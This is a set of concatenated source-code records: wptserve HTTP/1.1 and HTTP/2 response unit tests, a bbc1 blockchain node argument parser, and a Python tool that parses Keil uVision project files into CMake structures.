route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 204
assert resp.headers['server'] == 'TEST-H2'
assert resp.content == b''
if __name__ == '__main__':
unittest.main()
| import os
import unittest
import json
import types
from http.client import BadStatusLine
from io import BytesIO
import pytest
wptserve = pytest.importorskip("wptserve")
from .base import TestUsingServer, TestUsingH2Server, doc_root
def send_body_as_header(self):
if self._response.add_required_headers:
self.write_default_headers()
self.write("X-Body: ")
self._headers_complete = True
class TestResponse(TestUsingServer):
def test_head_without_body(self):
@wptserve.handlers.handler
def handler(request, response):
response.writer.end_headers = types.MethodType(send_body_as_header,
response.writer)
return [("X-Test", "TEST")], "body\r\n"
route = ("GET", "/test/test_head_without_body", handler)
self.server.router.register(*route)
resp = self.request(route[1], method="HEAD")
self.assertEqual("6", resp.info()['Content-Length'])
self.assertEqual("TEST", resp.info()['x-Test'])
self.assertEqual("", resp.info()['x-body'])
def test_head_with_body(self):
@wptserve.handlers.handler
def handler(request, response):
response.send_body_for_head_request = True
response.writer.end_headers = types.MethodType(send_body_as_header,
response.writer)
return [("X-Test", "TEST")], "body\r\n"
route = ("GET", "/test/test_head_with_body", handler)
self.server.router.register(*route)
resp = self.request(route[1], method="HEAD")
self.assertEqual("6", resp.info()['Content-Length'])
self.assertEqual("TEST", resp.info()['x-Test'])
self.assertEqual("body", resp.info()['X-Body'])
def test_write_content_no_status_no_header(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status_no_header", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert resp.info()["Content-Length"] == str(len(resp_content))
assert "Date" in resp.info()
assert "Server" in resp.info()
def test_write_content_no_headers(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_status(201)
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_headers", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 201
assert resp.read() == resp_content
assert resp.info()["Content-Length"] == str(len(resp_content))
assert "Date" in resp.info()
assert "Server" in resp.info()
def test_write_content_no_status(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_header("test-header", "test-value")
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert sorted(x.lower() for x in resp.info().keys()) == sorted(['test-header', 'date', 'server', 'content-length'])
def test_write_content_no_status_no_required_headers(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.add_required_headers = False
response.writer.write_header("test-header", "test-value")
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status_no_required_headers", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert resp.info().items() == [('test-header', 'test-value')]
def test_write_content_no_status_no_headers_no_required_headers(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.add_required_headers = False
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status_no_headers_no_required_headers", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert resp.info().items() == []
def test_write_raw_content(self):
resp_content = b"HTTP/1.1 202 Giraffe\n" \
b"X-TEST: PASS\n" \
b"Content-Length: 7\n\n" \
b"Content"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_content(resp_content)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 202
assert resp.info()["X-TEST"] == "PASS"
assert resp.read() == b"Content"
def test_write_raw_content_file(self):
@wptserve.handlers.handler
def handler(request, response):
with open(os.path.join(doc_root, "test.asis"), 'rb') as infile:
response.writer.write_raw_content(infile)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 202
assert resp.info()["X-TEST"] == "PASS"
assert resp.read() == b"Content"
def test_write_raw_none(self):
@wptserve.handlers.handler
def handler(request, response):
with pytest.raises(ValueError):
response.writer.write_raw_content(None)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
self.request(route[1])
def test_write_raw_contents_invalid_http(self):
resp_content = b"INVALID HTTP"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_content(resp_content)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
with pytest.raises(BadStatusLine) as e:
self.request(route[1])
assert str(e.value) == resp_content.decode('utf-8')
class TestH2Response(TestUsingH2Server):
def test_write_without_ending_stream(self):
data = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
headers = [
('server', 'test-h2'),
('test', 'PASS'),
]
response.writer.write_headers(headers, 202)
response.writer.write_data_frame(data, False)
# Should detect stream isn't ended and call `writer.end_stream()`
route = ("GET", "/h2test/test", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 202
assert [x for x in resp.headers.items()] == [('server', 'test-h2'), ('test', 'PASS')]
assert resp.content == data
def test_set_error(self):
@wptserve.handlers.handler
def handler(request, response):
response.set_error(503, message="Test error")
route = ("GET", "/h2test/test_set_error", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 503
assert json.loads(resp.content) == json.loads("{\"error\": {\"message\": \"Test error\", \"code\": 503}}")
def test_file_like_response(self):
@wptserve.handlers.handler
def handler(request, response):
content = BytesIO(b"Hello, world!")
response.content = content
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
assert resp.content == b"Hello, world!"
def test_list_response(self):
@wptserve.handlers.handler
def handler(request, response):
response.content = ['hello', 'world']
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
assert resp.content == b"helloworld"
def test_content_longer_than_frame_size(self):
@wptserve.handlers.handler
def handler(request, response):
size = response.writer.get_max_payload_size()
content = "a" * (size + 5)
return [('payload_size', size)], content
route = ("GET", "/h2test/test_content_longer_than_frame_size", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
payload_size = int(resp.headers['payload_size'])
assert payload_size
assert resp.content == b"a" * (payload_size + 5)
def test_encode(self):
@wptserve.handlers.handler
def handler(request, response):
response.encoding = "utf8"
t = response.writer.encode("hello")
assert t == b"hello"
with pytest.raises(ValueError):
response.writer.encode(None)
route = ("GET", "/h2test/test_content_longer_than_frame_size", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
def test_raw_header_frame(self):
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_header_frame([
(':status', '204'),
('server', 'TEST-H2')
], end_headers=True)
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 204
assert resp.headers['server'] == 'TEST-H2'
assert resp.content == b''
def test_raw_data_frame(self):
@wptserve.handlers.handler
def handler(request, response):
response.write_status_headers()
response.writer.write_raw_data_frame(data=b'Hello world', end_stream=True)
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.content == b'Hello world'
def test_raw_header_continuation_frame(self):
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_header_frame([
(':status', '204')
])
response.writer.write_raw_continuation_frame([
('server', 'TEST-H2')
], end_headers=True)
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 204
assert resp.headers['server'] == 'TEST-H2'
assert resp.content == b''
if __name__ == '__main__':
unittest.main()
| en | 0.956994 | # Should detect stream isn't ended and call `writer.end_stream()` | 2.425812 | 2 |
bbc1/core/command.py | ks91/bbc1-pub | 89 | 8553 | # -*- coding: utf-8 -*-
"""
Copyright (c) 2017 beyond-blockchain.org.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from argparse import ArgumentParser
import sys
sys.path.extend(["../../"])
from bbc1.core.bbc_config import DEFAULT_CORE_PORT, DEFAULT_P2P_PORT
DEFAULT_SERV_ADDR = '127.0.0.1'
def parser():
usage = 'python {} [--coreport <number>] [--p2pport <number>] [--workingdir <dir>] ' \
'[--config <filename>] [--default_config <filename>] [--nodekey] [--no_nodekey] [--domain0] ' \
'[--ledgersubsystem] [--ip4addr <IP addr>] [--ip6addr <IPv6 addr>] ' \
'[--log <filename>] [--verbose_level <string>] [--daemon] [--kill] [--help]'.format(__file__)
argparser = ArgumentParser(usage=usage)
argparser.add_argument('-cp', '--coreport', type=int, default=DEFAULT_CORE_PORT, help='waiting TCP port')
argparser.add_argument('-pp', '--p2pport', type=int, default=DEFAULT_P2P_PORT, help='waiting TCP port')
argparser.add_argument('-w', '--workingdir', type=str, default=".bbc1", help='working directory name')
argparser.add_argument('-c', '--config', type=str, default=None, help='config file name')
argparser.add_argument('--default_config', type=str, default=None, help='default config file')
argparser.add_argument('--nodekey', action='store_true', help='use node_key for admin command')
argparser.add_argument('--no_nodekey', action='store_true', help='don\'t use node_key for admin command')
argparser.add_argument('--domain0', action='store_true', help='connect to domain_global_0')
argparser.add_argument('--ledgersubsystem', action='store_true', help='use ledger_subsystem')
argparser.add_argument('--ip4addr', type=str, default=None, help='IPv4 address exposed to the external network')
argparser.add_argument('--ip6addr', type=str, default=None, help='IPv6 address exposed to the external network')
argparser.add_argument('-l', '--log', type=str, default="-", help='log filename/"-" means STDOUT')
argparser.add_argument('-d', '--daemon', action='store_true', help='run in background')
argparser.add_argument('-k', '--kill', action='store_true', help='kill the daemon')
argparser.add_argument('-v', '--verbose_level', type=str, default="debug",
help='log level all/debug/info/warning/error/critical/none')
args = argparser.parse_args()
return args
| # -*- coding: utf-8 -*-
"""
Copyright (c) 2017 beyond-blockchain.org.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from argparse import ArgumentParser
import sys
sys.path.extend(["../../"])
from bbc1.core.bbc_config import DEFAULT_CORE_PORT, DEFAULT_P2P_PORT
DEFAULT_SERV_ADDR = '127.0.0.1'
def parser():
usage = 'python {} [--coreport <number>] [--p2pport <number>] [--workingdir <dir>] ' \
'[--config <filename>] [--default_config <filename>] [--nodekey] [--no_nodekey] [--domain0] ' \
'[--ledgersubsystem] [--ip4addr <IP addr>] [--ip6addr <IPv6 addr>] ' \
'[--log <filename>] [--verbose_level <string>] [--daemon] [--kill] [--help]'.format(__file__)
argparser = ArgumentParser(usage=usage)
argparser.add_argument('-cp', '--coreport', type=int, default=DEFAULT_CORE_PORT, help='waiting TCP port')
argparser.add_argument('-pp', '--p2pport', type=int, default=DEFAULT_P2P_PORT, help='waiting TCP port')
argparser.add_argument('-w', '--workingdir', type=str, default=".bbc1", help='working directory name')
argparser.add_argument('-c', '--config', type=str, default=None, help='config file name')
argparser.add_argument('--default_config', type=str, default=None, help='default config file')
argparser.add_argument('--nodekey', action='store_true', help='use node_key for admin command')
argparser.add_argument('--no_nodekey', action='store_true', help='don\'t use node_key for admin command')
argparser.add_argument('--domain0', action='store_true', help='connect to domain_global_0')
argparser.add_argument('--ledgersubsystem', action='store_true', help='use ledger_subsystem')
argparser.add_argument('--ip4addr', type=str, default=None, help='IPv4 address exposed to the external network')
argparser.add_argument('--ip6addr', type=str, default=None, help='IPv6 address exposed to the external network')
argparser.add_argument('-l', '--log', type=str, default="-", help='log filename/"-" means STDOUT')
argparser.add_argument('-d', '--daemon', action='store_true', help='run in background')
argparser.add_argument('-k', '--kill', action='store_true', help='kill the daemon')
argparser.add_argument('-v', '--verbose_level', type=str, default="debug",
help='log level all/debug/info/warning/error/critical/none')
args = argparser.parse_args()
return args
| en | 0.854731 | # -*- coding: utf-8 -*- Copyright (c) 2017 beyond-blockchain.org. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. | 2.595205 | 3 |
main.py | cmcquinn/cmake-uvision-syncer | 0 | 8554 | """
Usage:
main.py [<project>]
Options:
<project> Path to the .uvprojx file (Keil® µVision5 Project File).
The .uvoptx file (Keil® µVision5 Project Options file) will
be located automatically as it shall be adjacent to the
.uvprojx file, having the same filename.
If this is a directory, .uvprojx is found automatically (if
multiple found then the latest changed is chosen).
If not provided then the current working directory is chosen
as a project directory.
"""
import enum
import operator
import os
import warnings
from collections import defaultdict
from dataclasses import dataclass
from os import DirEntry
from pathlib import Path
from typing import List, Optional, Union, Iterable, Collection, Set, Tuple, Callable, Dict, Iterator
from docopt import docopt
from lxml import etree
__author__ = "<NAME>"
UnknownInt = int
UnknownBool = bool
@enum.unique
class Language(enum.Enum):
ASM = "Assembler"
C = "C"
CPP = "C++"
@enum.unique
class FileType(enum.Enum):
C_SOURCE = 1
"""C Source file"""
ASM_SOURCE = 2
"""Assembly language file"""
OBJECT = 3
"""Object file"""
LIBRARY = 4
"""Library file"""
TEXT_DOCUMENT = 5
"""Text Document file"""
CUSTOM = 7
"""Custom file"""
CPP_SOURCE = 8
"""C++ Source file"""
IMAGE = 9
"""Image file"""
# region XML data structures for Project File
@dataclass
class Target:
@dataclass
class Toolset:
number: int
name: str
@dataclass
class Compiler:
cc: str
ac6: bool
@dataclass
class Options:
@dataclass
class Common:
device: str
vendor: str
pack_id: str
pack_url: str
cpu: str
device_id: int
register_file: str
@dataclass
class Properties:
use_cpp_compiler: bool
common: Common
properties: Properties
@dataclass
class Build:
@dataclass
class Misc:
@dataclass
class Memory:
@enum.unique
class Type(enum.Enum):
"""TODO: Real meaning unknown."""
TYPE0 = 0
TYPE1 = 1
name: str
type: Type
start: int
size: int
cpu_type: str
memories: List[Memory]
@dataclass
class C:
optimization: int
strict: bool
c99: bool
gnu: bool
misc: List[str]
defines: List[str]
undefines: List[str]
include_paths: List[str]
@dataclass
class Asm:
misc: List[str]
defines: List[str]
undefines: List[str]
include_paths: List[str]
@dataclass
class Linker:
text_address_range: int
data_address_range: int
misc: List[str]
misc: Misc
c: C
asm: Asm
ld: Linker
@dataclass
class File:
name: str
type: FileType
path: str
include_in_build: bool
"""Whether this file is included in the build or ignored."""
always_build: bool
"""Whether to always build this file."""
@dataclass
class Group:
name: str
files: List['Target.File']
name: str
toolset: Toolset
compiler: Compiler
options: Options
build: Build
groups: List[Group]
@dataclass
class RTE:
@dataclass
class TargetInfo:
@enum.unique
class VersionMatchMode(enum.Enum):
FIXED = "fixed"
name: str
version_match_mode: Optional[VersionMatchMode]
@dataclass
class Package:
name: str
url: str
vendor: str
version: str
target_infos: List['RTE.TargetInfo']
@dataclass
class Component:
class_: str
group: str
vendor: str
version: str
condition: str
package: 'RTE.Package'
target_infos: List['RTE.TargetInfo']
@dataclass
class File:
@enum.unique
class Attribute(enum.Enum):
CONFIG = "config"
@enum.unique
class Category(enum.Enum):
SOURCE = "source"
attr: Attribute
category: Category
condition: Optional[str]
name: str
version: str
instance: str
component: 'RTE.Component'
package: 'RTE.Package'
target_infos: List['RTE.TargetInfo']
packages: List[Package]
components: List[Component]
files: List[File]
# endregion XML data structures for Project File
# region XML data structures for Project Options file
@dataclass
class File:
group_number: int
"""Number of the :cls:`Group` this file belongs to."""
number: int
"""Number of the file (global across all groups)."""
type: FileType
"""File type as selected in the Options for File ... -> Properties dialog"""
expanded: bool
"""Whether the file is expanded (include file dependencies shown) in the Project Window file browser."""
include_in_build: bool
"""Whether this file is included in the build or ignored."""
always_build: bool
"""Whether to always build this file."""
tv_exp_opt_dlg: UnknownBool
dave2: UnknownBool
path: str
filename: str
rte_flag: bool
"""Whether this file is part of/managed by the Keil MDK Run-Time Environment (RTE) and therefore read-only."""
shared: UnknownBool
_project_file: Target.File = None
"""Reference to the instance of this file from the Project File."""
@dataclass
class Group:
name: str
"""Group name as shown in the Project Window file browser."""
expanded: bool
"""Whether the group is expanded (files shown) in the Project Window file browser."""
tv_exp_opt_dlg: UnknownBool
cb_sel: UnknownBool
rte_flag: bool
"""Whether this group is part of/managed by the Keil MDK Run-Time Environment (RTE) and therefore read-only."""
files: List[File]
"""List of files in this group."""
_project_group: Target.Group = None
"""Reference to the instance of this group from the Project File."""
# endregion XML data structures for Project Options file
# region XML parsing helper functions
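# Return the text of the single child element (or attribute) `name` of `element`.
# Raises ValueError unless exactly one matching tag is found; returns None only when `nullable` is set.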
def text(element: etree.ElementBase, name: str, is_attribute: bool = False, nullable: bool = False) -> Optional[str]:
if is_attribute:
if nullable:
return element.attrib.get(name)
else:
return element.attrib[name]
value = element.xpath(name)
if (not value) and nullable:
return None
if len(value) != 1:
raise ValueError(f"Only one '{name}' tag per tree is supported, {len(value)} found")
return value[0].text
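# Parse the element's text as a strict boolean ("0"/"1" by default), raising on any other value unless `nullable`.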
def strict_bool(element: etree.ElementBase, name: str, nullable: bool = False, *,
false_value: str = "0", true_value: str = "1") -> Optional[bool]:
value = text(element, name, nullable=nullable)
if value == false_value:
return False
if value == true_value:
return True
if (value is None) and nullable:
return None
raise ValueError(f"'{value}' (of {name}) is not valid boolean value")
def strict_hex(element: etree.ElementBase, name: str) -> int:
value = text(element, name)
if not value.startswith("0x"):
raise ValueError(f"'{value}' (of {name}) is not valid hexadecimal value")
return int(value, 16)
# endregion XML parsing helper functions
@dataclass
class UVisionProject:
project_file_path: str
project_options_path: str
# region Project File
targets: List[Target]
# endregion Project File
# region Project Options
groups: List[Group]
"""Groups of files, as shown in the Project Window file browser."""
# endregion Project Options
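# Parses the .uvprojx file and its matching .uvoptx file into a UVisionProject instance.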
@classmethod
def new(cls, project_file_path: str) -> 'UVisionProject':
fp_base = os.path.splitext(project_file_path)[0]
project_file_path = fp_base + ".uvprojx"
project_options_path = fp_base + ".uvoptx"
with open(project_file_path) as f:
# noinspection PyProtectedMember
xproj: etree._Element = etree.parse(f).getroot()
with open(project_options_path) as f:
# noinspection PyProtectedMember
xopt: etree._Element = etree.parse(f).getroot()
# region Project File
if xproj.tag != "Project":
raise ValueError("Invalid uVision Project File XML file")
# noinspection PyCallByClass,SpellCheckingInspection
targets = [
Target(
name=text(target, "TargetName"),
toolset=Target.Toolset(
number=strict_hex(target, "ToolsetNumber"),
name=text(target, "ToolsetName")
),
compiler=Target.Compiler(
cc=text(target, "pCCUsed", nullable=True),
ac6=strict_bool(target, "uAC6")
),
options=next(
# There is always only one TargetOption element, but using a generator is a clean and
# effective way of creating an inline local variable.
Target.Options(
common=next(
Target.Options.Common(
device=text(tco, "Device"),
vendor=text(tco, "Vendor"),
pack_id=text(tco, "PackID"),
pack_url=text(tco, "PackURL"),
cpu=text(tco, "Cpu"),
device_id=text(tco, "DeviceId"),
register_file=text(tco, "RegisterFile")
) for tco in to.xpath("TargetCommonOption")
),
properties=next(
Target.Options.Properties(
use_cpp_compiler=strict_bool(tcp, "UseCPPCompiler"),
) for tcp in to.xpath("CommonProperty")
)
) for to in target.xpath("TargetOption")
),
build=next(
Target.Build(
misc=Target.Build.Misc(
cpu_type=text(to_taa, "ArmAdsMisc/AdsCpuType"),
memories=[
Target.Build.Misc.Memory(
name=memory.tag,
type=Target.Build.Misc.Memory.Type(int(text(memory, "Type"))),
start=strict_hex(memory, "StartAddress"),
size=strict_hex(memory, "Size")
) for memory in to_taa.xpath("ArmAdsMisc/OnChipMemories/*")
]
),
c=next(
Target.Build.C(
optimization=int(text(to_taa_c, "Optim")),
strict=strict_bool(to_taa_c, "Strict"),
c99=strict_bool(to_taa_c, "uC99"),
gnu=strict_bool(to_taa_c, "uGnu"),
misc=[
mc.strip() for mc in text(to_taa_c, "VariousControls/MiscControls").split(",")
],
defines=[
mc.strip() for mc in text(to_taa_c, "VariousControls/Define").split(" ")
],
undefines=[
mc.strip() for mc in (text(to_taa_c, "VariousControls/Undefine") or "").split(" ")
],
include_paths=[
mc.strip() for mc in text(to_taa_c, "VariousControls/IncludePath").split(";")
]
) for to_taa_c in to_taa.xpath("Cads")
),
asm=next(
Target.Build.Asm(
misc=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/MiscControls") or "").split(",")
],
defines=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/Define") or "").split(" ")
],
undefines=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/Undefine") or "").split(" ")
],
include_paths=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/IncludePath") or "").split(";")
]
) for to_taa_a in to_taa.xpath("Aads")
),
ld=next(
Target.Build.Linker(
text_address_range=strict_hex(to_taa_ld, "TextAddressRange"),
data_address_range=strict_hex(to_taa_ld, "DataAddressRange"),
misc=[
mc.strip() for mc in
text(to_taa_ld, "Misc").split(",") # TODO: Delimiter unknown
]
) for to_taa_ld in to_taa.xpath("LDads")
)
) for to_taa in target.xpath("TargetOption/TargetArmAds")
),
groups=[
Target.Group(
name=text(group, "GroupName"),
files=[
Target.File(
name=text(file, "FileName"),
type=FileType(int(text(file, "FileType"))),
path=text(file, "FilePath"),
include_in_build=strict_bool(file, "FileOption/CommonProperty/IncludeInBuild",
nullable=True),
always_build=strict_bool(file, "FileOption/CommonProperty/AlwaysBuild",
nullable=True, true_value="2")
) for file in group.xpath("Files/File")
]
) for group in target.xpath("Groups/Group")
]
) for target in xproj.xpath("Targets/Target")
]
# region RTE
# noinspection PyCallByClass,PyTypeChecker
rte = RTE(
packages=[
RTE.Package(
name=text(package, "name", True),
url=text(package, "url", True),
vendor=text(package, "vendor", True),
version=text(package, "version", True),
target_infos=[
RTE.TargetInfo(
name=text(ti, "name", True),
# Using generator and list only for local variable
version_match_mode=next(RTE.TargetInfo.VersionMatchMode(vmm) if vmm else None
for vmm in [text(ti, "versionMatchMode", True, True)])
) for ti in package.xpath("targetInfos/targetInfo")
]
) for package in xproj.xpath("RTE/packages/package")
],
components=[
RTE.Component(
class_=text(component, "Cclass", True),
group=text(component, "Cgroup", True),
vendor=text(component, "Cvendor", True),
version=text(component, "Cversion", True),
condition=text(component, "condition", True),
package=next(
# There is always only one package, but using a generator is a clean and
# effective way of creating an inline local variable.
# This new instance of package will be replaced below with reference to an actual matching
# instance of the package from rte.packages.
RTE.Package(
name=text(package, "name", True),
url=text(package, "url", True),
vendor=text(package, "vendor", True),
version=text(package, "version", True),
target_infos=None
) for package in component.xpath("package")
),
target_infos=[
RTE.TargetInfo(
name=text(ti, "name", True),
# TODO: Handle nullable
# RTE.TargetInfo.VersionMatchMode(text(ti, "versionMatchMode", True, True))
version_match_mode=None
) for ti in component.xpath("targetInfos/targetInfo")
]
) for component in xproj.xpath("RTE/components/component")
],
files=[
RTE.File(
attr=RTE.File.Attribute(text(file, "attr", True)),
category=RTE.File.Category(text(file, "category", True)),
condition=text(file, "condition", True, True),
name=text(file, "name", True),
version=text(file, "version", True),
instance=text(file, "instance"),
component=next(
RTE.Component(
class_=text(component, "Cclass", True),
group=text(component, "Cgroup", True),
vendor=text(component, "Cvendor", True),
version=text(component, "Cversion", True),
condition=text(component, "condition", True),
package=None,
target_infos=None
) for component in file.xpath("component")
),
package=None, # TODO
target_infos=None, # TODO
) for file in xproj.xpath("RTE/files/file")
]
)
# TODO: Connect actual references of the rte.packages and rte.packages.target_infos
for component in rte.components:
cp = component.package
component.package = None
cp.target_infos = None
for package in rte.packages:
# Temporarily remove target_infos to enable usage of the equality operator.
pti = package.target_infos
package.target_infos = None
if cp == package:
component.package = package
package.target_infos = pti
break
package.target_infos = pti
# endregion RTE
# endregion Project File
# region Project Options
if xopt.tag != "ProjectOpt":
raise ValueError("Invalid uVision Project Options XML file")
groups: List[Group] = []
for group in xopt.xpath("Group"):
group_name = text(group, "GroupName")
# Find this group in the Project File
xproj_group = next(g for g in next(iter(targets)).groups if (g.name == group_name))
# Find all files in this group and also in the Project File
files: List[File] = []
for file in group.xpath("File"):
file_type = FileType(int(text(file, "FileType")))
file_name = text(file, "FilenameWithoutPath")
xproj_file = next(f for f in xproj_group.files if (f.type == file_type and f.name == file_name))
files.append(File(
group_number=int(text(file, "GroupNumber")),
number=int(text(file, "FileNumber")),
type=file_type,
expanded=strict_bool(file, "tvExp"),
include_in_build=xproj_file.include_in_build,
always_build=xproj_file.always_build,
tv_exp_opt_dlg=strict_bool(file, "tvExpOptDlg"),
dave2=strict_bool(file, "bDave2"),
path=text(file, "PathWithFileName"),
filename=file_name,
rte_flag=strict_bool(file, "RteFlg"),
shared=strict_bool(file, "bShared")
))
groups.append(Group(
name=group_name,
expanded=strict_bool(group, "tvExp"),
tv_exp_opt_dlg=strict_bool(group, "tvExpOptDlg"),
cb_sel=strict_bool(group, "cbSel"),
rte_flag=strict_bool(group, "RteFlg"),
files=files
))
# There is no more *currently relevant* data in the Project Options file.
# endregion Project Options
# Add RTE files to the file groups to actually match the Project Window file browser.
for file in rte.files:
# Find the group to which this file belongs (there shall be one and only one).
group = None
group_number = 1
for group_number, group in enumerate(groups, 1):
if group.files and group.files[0].group_number != group_number:
warnings.warn(f"Inconsistent group number {group.files[0].group_number} for group {group.name}"
f" (expected to be {group_number})")
if group.rte_flag and group.name.strip(":") == file.component.class_:
break
filename = os.path.basename(file.instance)
# Detect file type (this information is not provided for RTE files)
if filename.endswith(".s"):
file_type = FileType.ASM_SOURCE
elif filename.endswith(".c"):
file_type = FileType.C_SOURCE
elif filename.endswith(".cpp"):
file_type = FileType.CPP_SOURCE
elif filename.endswith(".h"):
file_type = FileType.TEXT_DOCUMENT
else:
warnings.warn(f"Unknown RTE file type '{file.instance}': {file}")
continue
group.files.append(File(
group_number=group_number,
number=max(f.number for g in groups for f in g.files) + 1,
type=file_type,
expanded=False,
include_in_build=True, # TODO: This information is available for RTE files
always_build=None,
tv_exp_opt_dlg=False, # TODO
dave2=False, # TODO
path=file.instance,
filename=os.path.basename(file.instance),
rte_flag=True,
shared=False
))
return cls(
project_file_path=project_file_path,
project_options_path=project_options_path,
targets=targets,
groups=groups
)
def source_files(self) -> Iterator[Tuple[File, Optional[Language], Optional[str]]]:
"""
Get all files grouped by file type, with group names as comments.
"""
# Add source files
for group in self.groups:
comment = group.name
if group.rte_flag:
# RTE groups start with double colon (::).
comment = "RTE" + comment
# Group files by type and add one comment for every file type, as each type goes into a separate section.
files: Dict[Union[Language, None], List[File]] = defaultdict(list)
for file in group.files:
if file.type == FileType.ASM_SOURCE:
lang = Language.ASM
elif file.type == FileType.C_SOURCE:
lang = Language.C
elif file.type == FileType.TEXT_DOCUMENT:
lang = None
else:
warnings.warn(f"Unsupported file type: {file.type} for {file}")
continue
files[lang].append(file)
for lang, files in files.items():
comment_per_type = comment
for file in files:
yield file, lang, comment_per_type
comment_per_type = None
class CMake:
@dataclass
class String:
value: str
"""The actual string value."""
languages: Set[Language]
"""Set of all build configs in which this value is present."""
common: bool = False
comment: Optional[str] = None
"""Comment which will be added to the line before"""
def __eq__(self, o: 'CMake.String') -> bool:
if isinstance(o, type(self)):
return self.value == o.value
elif isinstance(o, str):
return self.value == o
return NotImplemented
def __init__(self) -> None:
self.include_paths: List[CMake.String] = []
self.defines: List[CMake.String] = []
self.undefines: List[CMake.String] = []
self.source_file_paths: List[CMake.String] = []
self.other_file_paths: List[CMake.String] = []
@classmethod
def _get(cls, lst: List[String], obj: str) -> String:
"""Get existing object from the list or append a new one to the end."""
try:
# noinspection PyTypeChecker
itm = lst[lst.index(obj)]
except ValueError:
# noinspection PyCallByClass
itm = cls.String(obj, set())
lst.append(itm)
return itm
@classmethod
def _add_values(cls, where: List[String], values: Union[str, Iterable[str]],
languages: Union[Language, Collection[Language], None], comment: Optional[str] = None) -> None:
if isinstance(languages, Language):
languages = [languages]
for val in values:
obj = cls._get(where, val)
if comment is not None:
# Add comment to the first value only
obj.comment = comment
comment = None
if languages:
obj.languages.update(languages)
@staticmethod
def _clean_paths(paths: Union[str, Iterable[str]]) -> List[str]:
if isinstance(paths, (str, Path)):
paths = [paths]
return [Path(p).as_posix() for p in map(os.path.normpath, paths)]
def add_include_paths(self, paths: Union[str, Iterable[str]], languages: Union[Language, Collection[Language]],
comment: str = None) -> None:
self._add_values(self.include_paths, self._clean_paths(paths), languages, comment)
def add_defines(self, defines: Union[str, Iterable[str]], languages: Union[Language, Collection[Language]],
comment: str = None) -> None:
self._add_values(self.defines, defines, languages, comment)
def add_undefines(self, undefines: Union[str, Iterable[str]], languages: Union[Language, Collection[Language]],
comment: str = None) -> None:
self._add_values(self.undefines, undefines, languages, comment)
def add_source_files(self, paths: Union[None, str, Iterable[str]],
languages: Union[Language, Collection[Language], None],
comment: str = None, include_in_build: bool = True) -> None:
paths = self._clean_paths(paths)
# If file is not included in the build, comment it
if include_in_build is False:
paths = ["# " + path for path in paths]
self._add_values(self.source_file_paths if languages else self.other_file_paths, paths, languages, comment)
def add_other_files(self, paths: Union[str, Iterable[str]], comment: str = None) -> None:
self.add_source_files(paths, None, comment)
